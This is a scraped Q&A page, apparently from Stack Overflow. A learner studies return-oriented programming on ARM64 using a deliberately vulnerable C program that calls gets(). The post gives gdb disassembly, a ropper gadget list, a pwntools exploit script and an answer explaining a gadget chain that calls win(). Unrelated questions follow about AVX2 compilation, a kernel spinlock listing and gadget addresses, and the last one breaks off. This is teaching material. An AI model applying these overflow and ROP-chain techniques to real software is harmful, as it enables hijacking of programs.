Return Oriented Programming on ARM (64-bit) - security
I am studying ROP on ARM (64-bit), so I am testing a ROP vulnerability on my ARMv8 Cortex-A72 in order to understand how it works on ARM64.
I wrote a very simple vulnerable C program:
#include <stdio.h>
#include <string.h>
/* Target of the exercise: prints a message only when magic == 0xdeadbeef.
 * Nothing in the code shown here calls this function. */
void win(unsigned magic){
if(magic == 0xdeadbeef)
printf("I Should Never be Called!\n");
}
/* Prints the address of a local 80-byte buffer, then reads a line into it. */
void vuln(){
char buffer[80];
printf("Buffer at:%p\n",buffer);
/* gets() takes no length argument, so input longer than the buffer overruns it. */
gets(buffer);
}
/* Entry point: does not use argc/argv, just calls vuln(). */
int main(int argc, char **argv){
vuln();
}
In order to call the win function, I think the correct ROP chain is:
offset + pop {x0,pc} + correct_argument + win_address
This is the assembly code:
Dump of assembler code for function main:
0x00000055555557f8 <+0>: stp x29, x30, [sp, #-32]!
0x00000055555557fc <+4>: mov x29, sp
0x0000005555555800 <+8>: str w0, [sp, #28]
0x0000005555555804 <+12>: str x1, [sp, #16]
0x0000005555555808 <+16>: bl 0x55555557c8 <vuln>
0x000000555555580c <+20>: mov w0, #0x0 // #0
0x0000005555555810 <+24>: ldp x29, x30, [sp], #32
0x0000005555555814 <+28>: ret
Dump of assembler code for function vuln:
0x00000055555557c8 <+0>: stp x29, x30, [sp, #-96]!
0x00000055555557cc <+4>: mov x29, sp
0x00000055555557d0 <+8>: add x0, sp, #0x10
0x00000055555557d4 <+12>: mov x1, x0
0x00000055555557d8 <+16>: adrp x0, 0x5555555000
0x00000055555557dc <+20>: add x0, x0, #0x8c0
0x00000055555557e0 <+24>: bl 0x5555555680 <printf@plt>
0x00000055555557e4 <+28>: add x0, sp, #0x10
0x00000055555557e8 <+32>: bl 0x5555555690 <gets@plt>
0x00000055555557ec <+36>: nop
0x00000055555557f0 <+40>: ldp x29, x30, [sp], #96
0x00000055555557f4 <+44>: ret
Dump of assembler code for function win:
0x00000055555557b4 <+0>: sub sp, sp, #0x10
0x00000055555557b8 <+4>: str w0, [sp, #12]
0x00000055555557bc <+8>: nop
0x00000055555557c0 <+12>: add sp, sp, #0x10
0x00000055555557c4 <+16>: ret
First I disabled ASLR. Then, using gdb, I identified the offset at which the pc gets overwritten: it is 96 bytes. The last 8 bytes of those 96 overwrite the saved link register, so the pc will end up pointing to whatever is placed there. The next step is to find the right gadget. Since I am working on ARMv8 and the function win() takes one argument, I am looking for a pop {x0, pc} gadget to build my ROP chain. I used ropper to search for gadgets. Here is the output of the ropper command:
0x00000000000007c0: add sp, sp, #0x10; ret;
0x00000000000007e4: add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000648: add x16, x16, #0; br x17;
0x0000000000000668: add x16, x16, #0x10; br x17;
0x0000000000000678: add x16, x16, #0x18; br x17;
0x0000000000000688: add x16, x16, #0x20; br x17;
0x0000000000000698: add x16, x16, #0x28; br x17;
0x000000000000062c: add x16, x16, #0xff8; br x17;
0x0000000000000658: add x16, x16, #8; br x17;
0x0000000000000870: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000006d8: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000624: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000660: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000670: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000650: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000640: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x00000000000006e4: b #0x660; ret;
0x00000000000007b0: b #0x720; sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000704: b.eq #0x71c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000884: b.ne #0x868; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000006d4: bl #0x670; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x00000000000007e0: bl #0x680; add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x00000000000007e8: bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000610: bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000790: bl #0x6f0; movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000808: bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: blr x3;
0x0000000000000718: br x16;
0x0000000000000718: br x16; ret;
0x0000000000000630: br x17;
0x00000000000006e0: cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000740: cbz x1, #0x758; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000888: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000088c: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000890: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000614: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007a0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000894: ldp x29, x30, [sp], #0x40; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x60; ret;
0x00000000000006dc: ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000664: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000674: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000684: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000694: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000628: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000654: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000644: ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000079c: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000868: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000878: mov w0, w22; blr x3;
0x0000000000000874: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000714: mov x16, x1; br x16;
0x0000000000000714: mov x16, x1; br x16; ret;
0x0000000000000750: mov x16, x2; br x16;
0x0000000000000750: mov x16, x2; br x16; ret;
0x000000000000086c: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x000000000000060c: mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a8: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x000000000000080c: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000794: movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000620: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000608: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a4: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000800: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b8: str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000804: str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b4: sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x00000000000007bc: nop; add sp, sp, #0x10; ret;
0x000000000000063c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000638: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000089c: nop; ret;
0x0000000000000618: ret;
As you can see, there are no gadgets like pop {x0,pc}. However, according to the ARMv8 cheat sheet, ldp x29, x30, [sp], #0x60 pops x29 and x30 from the stack, so basically we can consider ldp to be a pop instruction. But again, there is no gadget which pops the x0 register from the stack.
So my question is: how can I build the ROP chain using the gadgets that ropper found?
Please help me to understand it. Thank you.
My exploit:
# Builds an overflow payload for ./badcode and sends it on the program's stdin.
# Intended chain: return into the "ldp" gadget to load x19-x24 from the stack,
# then into the "ldr" gadget, which loads x3 from [x21 + x19*8], copies w22 into
# w0 and branches to x3.
from pwn import *
# gadget
# NOTE(review): in the gdb dump shown earlier in the post, 0x555555580c is main+20
# and win starts at 0x55555557b4; this value presumably comes from a different
# build of the binary -- verify against the binary actually being run.
win = p64(0x000000555555580c)
# NOTE(review): 0x8f8 and 0x8d8 are the addresses exactly as ropper prints them.
# The gdb dump shows the code mapped at 0x5555555xxx, so these look like offsets
# within the file rather than runtime addresses -- confirm, and add the load base
# if so.
gadget_ldp = p64(0x00000000000008f8) #ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
gadget_ldr = p64(0x00000000000008d8) # ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
# Value win() compares its argument against.
magic = p64(0xdeadbeef)
# Meant for x21, the base register of "ldr x3, [x21, x19, lsl #3]", so it has to
# point at memory that holds win's address.
# NOTE(review): 0x7ffffff000 is hard-coded; the program prints the real buffer
# address ("Buffer at:%p") -- confirm this value matches where win is stored.
buf = p64(0x7ffffff000)
# payload
# 56 filler bytes, then win's address (so it sits at buffer offset 56), then 24
# more filler bytes: 88 bytes in total, which puts gadget_ldp at offsets 88..95,
# the 8 bytes the post says overwrite the saved link register.
payload = b'\x90'*56;
payload += win;
payload += b'\x90'*24; #offset
payload += gadget_ldp;
# Values intended for the registers the ldp gadget loads.
# NOTE(review): that gadget reads x29/x30 from [sp], x19/x20 from [sp,#0x10],
# x21/x22 from [sp,#0x20] and x23/x24 from [sp,#0x30]; whether the values below
# land in those slots depends on where sp points when the gadget runs -- TODO
# verify in gdb.
payload += b'\x00'*8; # x19 must be zero so that [x21 + x19*8] is just [x21]
payload += b'\x90'*8; # ldp register x20
payload += buf; #ldp register x21
payload += magic; #ldp register x22
payload += b'\x90'*8; #ldp register x23
payload += b'\x90'*8; #ldp register x24
payload += gadget_ldr;
# start the binary as a local process and send the payload
conn = process('./badcode')
conn.sendline(payload)
# first line of output from the process (the program prints "Buffer at:..." first)
print(conn.recvline())
conn.interactive()
With the gadget at 0x0888 we can load all of x19-x24 from the stack and return, so we can set all their values arbitrarily and go on.
0x0878 has mov w0, w22, which is nice, but then the branch is to x3 which we don't yet control.
But back up a few instructions and look at the 0x0868 gadget. Notable for us is:
ldr x3, [x21, x19, lsl #3]
//...
mov w0, w22
blr x3
So if in our previous step, we loaded x21 with some address where a pointer to win can be found (maybe a place on the stack that we've set), and set x19 to zero, then we get win in x3. And likewise if in our previous step we loaded x22 with 0xdeadbeef, then we get it in w0 here. So we should be able to branch to win with w0 set as desired.
Related
Can't get vectorclass library to compile to AVX2 instructions in MSVC2019
I have tried my best to get the vectorclass library to generate AVX2 instructions, but can't get it to. I'm using MSVC2019. Here are the compile options: /permissive- /ifcOutput "x64\Release" /GS /Qpar /GL /W3 /Gy /Zc:wchar_t /I"D:\Tools\vectorclass" /I"D:\Tools\libzmq/include" /I"D:\Tools\boost\boost_1_79_0" /Zi /Gm- /O2 /Ob2 /sdl /Fd"x64\Release\vc142.pdb" /Zc:inline /D "__AVX2__" /D "ZMQ_STATIC" /D "FILE_INPUT" /D "NDEBUG" /D "WIN32" /D "_CRT_SECURE_NO_WARNINGS" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /std:c17 /arch:AVX2 /Gd /Oi /MT /std:c++17 /FC /Fa"x64\Release" /EHsc /nologo /Fo"x64\Release" /Ot /Fp"x64\Release\RtnLink_MSVC.pch" /diagnostics:column In addition I've tried to force it with macro definitions AVX2 and INSTRSET but no luck. #define INSTRSET (8) #define __AVX2__ #pragma warning(disable : 4984) //warning C4984: 'if constexpr' is a C++17 language extension #include "vectorclass.h" size_t test(size_t size) { Vec8ui incr(8); Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7); for (size_t i = 8; i < size; i += 8) { accum = accum + accum; } size_t result = horizontal_max(accum); const __m256i incr2 = _mm256_set1_epi32(8); __m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7); for (size_t i = 8; i < size; i += 8) { accum2 = _mm256_add_epi32(accum2, incr2); } __declspec(align(32)) int32_t values_array[8]; _mm256_store_si256((__m256i*)values_array, accum2); size_t result2 = values_array[0]; for (int i = 1; i < 8; i++) { if (values_array[i] > result2) { result2 = values_array[i]; } } return result; } This compiles to the following 2 loops: Using vectorclass (no AVX2 instructions): Vec8ui incr(8); 00007FF7A9BC2E5A mov edx,8 00007FF7A9BC2E5F lea rcx,[incr] 00007FF7A9BC2E63 call Vec8ui::Vec8ui (07FF7A9B58BFEh) Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7); 00007FF7A9BC2E68 mov dword ptr [rsp+40h],7 00007FF7A9BC2E70 mov dword ptr [rsp+38h],6 00007FF7A9BC2E78 mov dword ptr [rsp+30h],5 00007FF7A9BC2E80 mov dword ptr [rsp+28h],4 
00007FF7A9BC2E88 mov dword ptr [rsp+20h],3 00007FF7A9BC2E90 mov r9d,2 00007FF7A9BC2E96 mov r8d,1 00007FF7A9BC2E9C xor edx,edx 00007FF7A9BC2E9E lea rcx,[accum] 00007FF7A9BC2EA2 call Vec8ui::Vec8ui (07FF7A9B54B99h) for (size_t i = 8; i < size; i += 8) { 00007FF7A9BC2EA7 mov qword ptr [rbp+98h],8 00007FF7A9BC2EB2 jmp __$EncStackInitStart+0A2h (07FF7A9BC2EC6h) 00007FF7A9BC2EB4 mov rax,qword ptr [rbp+98h] 00007FF7A9BC2EBB add rax,8 00007FF7A9BC2EBF mov qword ptr [rbp+98h],rax 00007FF7A9BC2EC6 mov rax,qword ptr [size] 00007FF7A9BC2ECD cmp qword ptr [rbp+98h],rax 00007FF7A9BC2ED4 jae __$EncStackInitStart+10Fh (07FF7A9BC2F33h) accum = accum + accum; 00007FF7A9BC2ED6 lea rax,[rbp+4C0h] 00007FF7A9BC2EDD lea rcx,[accum] 00007FF7A9BC2EE1 mov rdi,rax 00007FF7A9BC2EE4 mov rsi,rcx 00007FF7A9BC2EE7 mov ecx,20h 00007FF7A9BC2EEC rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2EEE lea rax,[rbp+480h] 00007FF7A9BC2EF5 lea rcx,[accum] 00007FF7A9BC2EF9 mov rdi,rax 00007FF7A9BC2EFC mov rsi,rcx 00007FF7A9BC2EFF mov ecx,20h 00007FF7A9BC2F04 rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2F06 lea r8,[rbp+4C0h] 00007FF7A9BC2F0D lea rdx,[rbp+480h] 00007FF7A9BC2F14 lea rcx,[rbp+380h] 00007FF7A9BC2F1B call operator+ (07FF7A9BC29C0h) 00007FF7A9BC2F20 lea rcx,[accum] 00007FF7A9BC2F24 mov rdi,rcx 00007FF7A9BC2F27 mov rsi,rax 00007FF7A9BC2F2A mov ecx,20h 00007FF7A9BC2F2F rep movs byte ptr [rdi],byte ptr [rsi] } 00007FF7A9BC2F31 jmp __$EncStackInitStart+90h (07FF7A9BC2EB4h) size_t result = horizontal_max(accum); 00007FF7A9BC2F33 lea rax,[rbp+500h] 00007FF7A9BC2F3A lea rcx,[accum] 00007FF7A9BC2F3E mov rdi,rax 00007FF7A9BC2F41 mov rsi,rcx 00007FF7A9BC2F44 mov ecx,20h 00007FF7A9BC2F49 rep movs byte ptr [rdi],byte ptr [rsi] 00007FF7A9BC2F4B lea rcx,[rbp+500h] 00007FF7A9BC2F52 call horizontal_max<Vec8ui> (07FF7A9B54FB3h) 00007FF7A9BC2F57 mov eax,eax 00007FF7A9BC2F59 mov qword ptr [result],rax Using intrinsics (we get AVX2 instructions): const __m256i incr2 = _mm256_set1_epi32(8); 00007FF7A9BC2F60 
vmovdqu ymm0,ymmword ptr [__ymm#0000000800000008000000080000000800000008000000080000000800000008 (07FF7A9E87940h)] 00007FF7A9BC2F68 vmovdqu ymmword ptr [rbp+3C0h],ymm0 00007FF7A9BC2F70 vmovdqu ymm0,ymmword ptr [rbp+3C0h] 00007FF7A9BC2F78 vmovdqu ymmword ptr [incr2],ymm0 __m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7); 00007FF7A9BC2F80 vmovdqu ymm0,ymmword ptr [__ymm#0000000700000006000000050000000400000003000000020000000100000000 (07FF7A9E87900h)] 00007FF7A9BC2F88 vmovdqu ymmword ptr [rbp+400h],ymm0 00007FF7A9BC2F90 vmovdqu ymm0,ymmword ptr [rbp+400h] 00007FF7A9BC2F98 vmovdqu ymmword ptr [accum2],ymm0 for (size_t i = 8; i < size; i += 8) { 00007FF7A9BC2FA0 mov qword ptr [rbp+158h],8 00007FF7A9BC2FAB jmp __$EncStackInitStart+19Bh (07FF7A9BC2FBFh) 00007FF7A9BC2FAD mov rax,qword ptr [rbp+158h] 00007FF7A9BC2FB4 add rax,8 00007FF7A9BC2FB8 mov qword ptr [rbp+158h],rax 00007FF7A9BC2FBF mov rax,qword ptr [size] 00007FF7A9BC2FC6 cmp qword ptr [rbp+158h],rax 00007FF7A9BC2FCD jae __$EncStackInitStart+1D5h (07FF7A9BC2FF9h) accum2 = _mm256_add_epi32(accum2, incr2); 00007FF7A9BC2FCF vmovdqu ymm0,ymmword ptr [accum2] 00007FF7A9BC2FD7 vpaddd ymm0,ymm0,ymmword ptr [incr2] 00007FF7A9BC2FDF vmovdqu ymmword ptr [rbp+440h],ymm0 00007FF7A9BC2FE7 vmovdqu ymm0,ymmword ptr [rbp+440h] 00007FF7A9BC2FEF vmovdqu ymmword ptr [accum2],ymm0 } 00007FF7A9BC2FF7 jmp __$EncStackInitStart+189h (07FF7A9BC2FADh) __declspec(align(32)) int32_t values_array[8]; _mm256_store_si256((__m256i*)values_array, accum2); 00007FF7A9BC2FF9 vmovdqu ymm0,ymmword ptr [accum2] 00007FF7A9BC3001 vmovdqa ymmword ptr [values_array],ymm0 size_t result2 = values_array[0]; 00007FF7A9BC3009 mov eax,4 00007FF7A9BC300E imul rax,rax,0 00007FF7A9BC3012 movsxd rax,dword ptr values_array[rax] 00007FF7A9BC301A mov qword ptr [result2],rax for (int i = 1; i < 8; i++) { 00007FF7A9BC3021 mov dword ptr [rbp+1D4h],1 00007FF7A9BC302B jmp __$EncStackInitStart+217h (07FF7A9BC303Bh) 00007FF7A9BC302D mov eax,dword ptr [rbp+1D4h] 
00007FF7A9BC3033 inc eax 00007FF7A9BC3035 mov dword ptr [rbp+1D4h],eax 00007FF7A9BC303B cmp dword ptr [rbp+1D4h],8 00007FF7A9BC3042 jge __$EncStackInitStart+250h (07FF7A9BC3074h) if (values_array[i] > result2) { 00007FF7A9BC3044 movsxd rax,dword ptr [rbp+1D4h] 00007FF7A9BC304B movsxd rax,dword ptr values_array[rax*4] 00007FF7A9BC3053 cmp rax,qword ptr [result2] 00007FF7A9BC305A jbe __$EncStackInitStart+24Eh (07FF7A9BC3072h) result2 = values_array[i]; 00007FF7A9BC305C movsxd rax,dword ptr [rbp+1D4h] 00007FF7A9BC3063 movsxd rax,dword ptr values_array[rax*4] 00007FF7A9BC306B mov qword ptr [result2],rax
What is the meaning of ".inst" in an ARM assembly listing?
Kernel version : 4.14.199 The spin_lock assembly instructions in crash is crash_arm64> dis _raw_spin_lock -x 0xffffff8008c41e90 <_raw_spin_lock>: stp x29, x30, [sp,#-32]! 0xffffff8008c41e94 <_raw_spin_lock+0x4>: str x19, [sp,#16] 0xffffff8008c41e98 <_raw_spin_lock+0x8>: mov x29, sp 0xffffff8008c41e9c <_raw_spin_lock+0xc>: mov x19, x0 0xffffff8008c41ea0 <_raw_spin_lock+0x10>: nop 0xffffff8008c41ea4 <_raw_spin_lock+0x14>: mov w0, #0x1 // #1 0xffffff8008c41ea8 <_raw_spin_lock+0x18>: bl 0xffffff80080f399c <preempt_count_add> 0xffffff8008c41eac <_raw_spin_lock+0x1c>: mov w10, #0x10000 // #65536 0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined 0xffffff8008c41eb4 <_raw_spin_lock+0x24>: nop 0xffffff8008c41eb8 <_raw_spin_lock+0x28>: nop 0xffffff8008c41ebc <_raw_spin_lock+0x2c>: nop 0xffffff8008c41ec0 <_raw_spin_lock+0x30>: eor w9, w8, w8, ror #16 0xffffff8008c41ec4 <_raw_spin_lock+0x34>: cbz w9, 0xffffff8008c41edc <_raw_spin_lock+0x4c> 0xffffff8008c41ec8 <_raw_spin_lock+0x38>: sevl 0xffffff8008c41ecc <_raw_spin_lock+0x3c>: wfe 0xffffff8008c41ed0 <_raw_spin_lock+0x40>: ldaxrh w10, [x19] 0xffffff8008c41ed4 <_raw_spin_lock+0x44>: eor w9, w10, w8, lsr #16 0xffffff8008c41ed8 <_raw_spin_lock+0x48>: cbnz w9, 0xffffff8008c41ecc <_raw_spin_lock+0x3c> 0xffffff8008c41edc <_raw_spin_lock+0x4c>: ldr x19, [sp,#16] 0xffffff8008c41ee0 <_raw_spin_lock+0x50>: ldp x29, x30, [sp],#32 0xffffff8008c41ee4 <_raw_spin_lock+0x54>: ret What's the meaning of .inst instructions ? 0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined I found the function definition in arch/arm64/include/asm/spinlock.h. static inline void arch_spin_lock(arch_spinlock_t *lock) { unsigned int tmp; arch_spinlock_t lockval, newval; asm volatile( /* Atomically increment the next ticket. 
*/ ARM64_LSE_ATOMIC_INSN( /* LL/SC */ " prfm pstl1strm, %3\n" "1: ldaxr %w0, %3\n" " add %w1, %w0, %w5\n" " stxr %w2, %w1, %3\n" " cbnz %w2, 1b\n", /* LSE atomics */ " mov %w2, %w5\n" " ldadda %w2, %w0, %3\n" __nops(3) ) /* Did we get the lock? */ " eor %w1, %w0, %w0, ror #16\n" " cbz %w1, 3f\n" /* * No: spin on the owner. Send a local event to avoid missing an * unlock before the exclusive load. */ " sevl\n" "2: wfe\n" " ldaxrh %w2, %4\n" " eor %w1, %w2, %w0, lsr #16\n" " cbnz %w1, 2b\n" /* We got the lock. Critical section starts here. */ "3:" : "=&r" (lockval), "=&r" (newval), "=&r" (tmp), "+Q" (*lock) : "Q" (lock->owner), "I" (1 << TICKET_SHIFT) : "memory"); } In my opinion, the .inst 0xb8aa0268 should correspond to ldadda %w2, %w0, %3\n". Why the crash displayed is different from the source code ?
Find out where rop gadgets are actually loaded in memory using Ropper
I am studying ROP on Arm64, I posted my thread here Return Oriented Programming on ARM (64-bit) However a new/separate issue about choosing rop gadgets has arisen which requires the opening of a new thread. So to sum up i am studying ROP vulnerability on ARM 64 bit and i am trying to test it using a very simple c code (attached to the previous thread). I'am using ropper tool in order to search for gadgets to build my rop chain. But when i overflow the pc with the address of the gadget i got this within gdb: [!] Cannot disassemble from $PC [!] Cannot access memory at address 0x8f8 stopped 0x8f8 in ?? () I overflow the pc with 0x00000000000008f8 gadget but it can't be the actual address loaded in memory. Here the list of rop gadgets that i have got by using ropper: 0x0000000000000858: add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000828: add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000688: add x16, x16, #0; br x17; 0x00000000000006a8: add x16, x16, #0x10; br x17; 0x00000000000006b8: add x16, x16, #0x18; br x17; 0x00000000000006c8: add x16, x16, #0x20; br x17; 0x00000000000006d8: add x16, x16, #0x28; br x17; 0x00000000000006e8: add x16, x16, #0x30; br x17; 0x000000000000066c: add x16, x16, #0xff8; br x17; 0x0000000000000698: add x16, x16, #8; br x17; 0x00000000000008e0: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x0000000000000824: adrp x0, #0; add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000728: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret; 0x0000000000000664: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x00000000000006a0: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17; 
0x00000000000006b0: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17; 0x00000000000006c0: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17; 0x00000000000006d0: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17; 0x00000000000006e0: adrp x16, #0x11000; ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17; 0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17; 0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; 0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x0000000000000734: b #0x6a0; ret; 0x0000000000000754: b.eq #0x76c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; 0x00000000000008f4: b.ne #0x8d8; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret; 0x0000000000000724: bl #0x6b0; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret; 0x000000000000082c: bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000854: bl #0x6d0; add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x000000000000085c: bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000648: bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x00000000000007e0: bl #0x740; movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x000000000000087c: bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000008ec: blr x3; 0x0000000000000768: br x16; 0x0000000000000768: br x16; ret; 0x0000000000000670: br x17; 0x0000000000000730: cbz x0, #0x738; b #0x6a0; ret; 0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16; 0x0000000000000760: cbz x1, #0x76c; 